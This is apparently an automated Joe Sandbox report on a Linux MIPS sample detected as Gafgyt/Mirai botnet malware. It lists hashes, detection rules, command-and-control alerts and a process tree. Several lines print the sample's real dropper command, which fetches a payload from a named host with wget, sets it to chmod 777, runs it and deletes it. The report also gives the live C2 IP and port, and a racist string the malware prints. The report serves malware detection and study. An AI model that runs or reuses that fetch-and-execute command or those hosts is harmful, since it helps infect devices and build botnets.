Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mipsel.elf

Overview

General Information

Sample name:mipsel.elf
Analysis ID:1686580
Has dependencies:false
MD5:42df0be80d2c8672b1f3f98383648b9b
SHA1:a6aa14c2b6b56e854de2828853ff44ef511ca246
SHA256:97bb2f637b0b13cc8a54e00a360eba90029d90b28dcdaeeab86b5df673293593
Tags:elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score:96
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Mirai
Contains symbols with names commonly found in malware
Opens /proc/net/* files useful for finding connected devices and routers
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings that are user agent strings indicative of HTTP manipulation
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1686580
Start date and time:2025-05-10 07:43:17 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mipsel.elf
Detection:MAL
Classification:mal96.spre.troj.linELF@0/0@6/0
  • VT rate limit hit for: gay.energy
Command:/tmp/mipsel.elf
PID:5493
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate alot
Standard Error:
  • system is lnxubuntu20
  • mipsel.elf (PID: 5493, Parent: 5410, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.elf
    • sh (PID: 5495, Parent: 5493, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      • sh New Fork (PID: 5510, Parent: 5495)
      • wget (PID: 5510, Parent: 5495, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q http://gay.energy/.../vivid -O .....
      • sh New Fork (PID: 5511, Parent: 5495)
      • chmod (PID: 5511, Parent: 5495, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 .....
      • sh New Fork (PID: 5512, Parent: 5495)
      • sh (PID: 5512, Parent: 5495, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh ./.....
      • sh New Fork (PID: 5514, Parent: 5495)
      • rm (PID: 5514, Parent: 5495, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf .....
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
mipsel.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    mipsel.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      mipsel.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1c940:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c954:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c968:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c97c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c990:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1ca08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1ca1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1ca30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1ca44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1ca58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1ca6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1ca80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1ca94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1caa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1cabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1cad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x1c940:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c954:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c968:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c97c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c990:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1ca08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1ca1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1ca30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1ca44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1ca58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1ca6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1ca80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1ca94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1caa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1cabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1cad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1c940:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c954:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c968:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c97c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c990:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1c9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1ca08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1ca1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1ca30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1ca44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1ca58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1ca6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1ca80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1ca94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1caa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1cabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1cad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            Click to see the 7 entries
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-05-10T07:44:14.452773+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440804TCP
            2025-05-10T07:44:30.009024+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440806TCP
            2025-05-10T07:44:45.567267+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440808TCP
            2025-05-10T07:45:01.128396+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440810TCP
            2025-05-10T07:45:16.685783+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440812TCP
            2025-05-10T07:45:32.244307+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440814TCP
            2025-05-10T07:45:47.802021+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440816TCP
            2025-05-10T07:46:03.359580+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440818TCP
            2025-05-10T07:46:18.916025+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440820TCP
            2025-05-10T07:46:34.471654+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440822TCP
            2025-05-10T07:46:50.030885+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440824TCP
            2025-05-10T07:47:05.583817+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440826TCP
            2025-05-10T07:47:21.142814+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440828TCP
            2025-05-10T07:47:36.710664+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440830TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: mipsel.elfAvira: detected
            Source: mipsel.elfVirustotal: Detection: 65%Perma Link
            Source: mipsel.elfReversingLabs: Detection: 62%

            Spreading

            barindex
            Source: /tmp/mipsel.elf (PID: 5493)Opens: /proc/net/routeJump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40816
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40810
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40814
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40822
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40828
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40818
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40804
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40806
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40808
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40826
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40830
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40824
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40812
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40820
            Source: global trafficTCP traffic: 192.168.2.14:40804 -> 92.60.77.69:666
            Source: /bin/sh (PID: 5510)Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....Jump to behavior
            Source: /usr/bin/wget (PID: 5510)Reads hosts file: /etc/hostsJump to behavior
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: global trafficDNS traffic detected: DNS query: gay.energy
            Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com

            System Summary

            barindex
            Source: mipsel.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: mipsel.elf PID: 5493, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: mipsel.elf PID: 5497, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: mipsel.elf PID: 5499, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: ELF static info symbol of initial sampleName: vseattack
            Source: mipsel.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: mipsel.elf PID: 5493, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: mipsel.elf PID: 5497, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: mipsel.elf PID: 5499, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal96.spre.troj.linELF@0/0@6/0
            Source: mipsel.elfELF static info symbol of initial sample: libc/string/mips/memcpy.S
            Source: mipsel.elfELF static info symbol of initial sample: libc/string/mips/memset.S
            Source: mipsel.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/crt1.S
            Source: mipsel.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/crti.S
            Source: mipsel.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/crtn.S
            Source: mipsel.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/pipe.S
            Source: mipsel.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/syscall_error.S
            Source: mipsel.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/vfork.S
            Source: /usr/bin/wget (PID: 5510)File: /tmp/.....Jump to behavior
            Source: /bin/sh (PID: 5512)Directory: /tmp/.....Jump to behavior
            Source: /bin/sh (PID: 5512)Directory: /tmp/.....Jump to behavior
            Source: /usr/bin/wget (PID: 5510)Empty hidden file: /tmp/.....Jump to behavior
            Source: /tmp/mipsel.elf (PID: 5495)Shell command executed: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."Jump to behavior
            Source: /bin/sh (PID: 5511)Chmod executable: /usr/bin/chmod -> chmod 777 .....Jump to behavior
            Source: /bin/sh (PID: 5514)Rm executable: /usr/bin/rm -> rm -rf .....Jump to behavior
            Source: /bin/sh (PID: 5510)Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....Jump to behavior
            Source: /usr/bin/chmod (PID: 5511)File: /tmp/..... (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
            Source: /bin/sh (PID: 5511)Chmod executable with 777: /usr/bin/chmod -> chmod 777 .....Jump to behavior
            Source: /tmp/mipsel.elf (PID: 5493)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/wget (PID: 5510)Queries kernel information via 'uname': Jump to behavior
            Source: mipsel.elf, 5493.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp, mipsel.elf, 5497.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp, mipsel.elf, 5499.1.000055c80d9f4000.000055c80da7b000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
